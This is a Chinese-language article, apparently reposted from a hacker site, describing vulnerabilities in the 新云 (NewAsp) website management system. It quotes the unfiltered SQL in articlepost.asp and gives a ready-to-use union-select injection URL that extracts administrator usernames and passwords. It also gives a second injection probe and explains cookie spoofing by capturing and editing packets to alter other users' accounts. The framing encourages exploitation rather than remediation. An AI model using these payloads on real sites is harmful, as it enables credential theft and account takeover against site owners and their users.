网络安全 频道

新云网站管理系统文件注入漏洞

关于新云

新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。

漏洞原理

利用各种方法实现入侵,如COOKIES、抓包、注入检测等。

1.过滤未全

user\articlepost.asp 文件第333行

Quote 

SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,

WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And

 username=’" & Newasp.MemberName & "’ 

And ArticleID=" & Request("ArticleID")

没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:

articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%

201,2,3,4,5,username,password,8,9%20from%20nc_admin

注册后直接在浏览器上输入,就可以爆出管理员的表和代码。

2.新云2.1SQL版注入漏洞

漏洞描述:

动画频道的“动画管理”和“审核管理”,错误类型:

Quote 

Microsoft OLE DB Provider for SQL Server (0x80040E14) 

未能找到存储过程 ’NC_FlashAdminList’。 

/admin/admin_Flash.asp, 第 233 行

可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:

articlepost.asp?ChannelID=1&action=view&ArticleID=1;--

3.COOKIES欺骗获取管理账号

攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。

http://www.cnxhacker.com/Article/safe/vuls/200612/7155.html

0
相关文章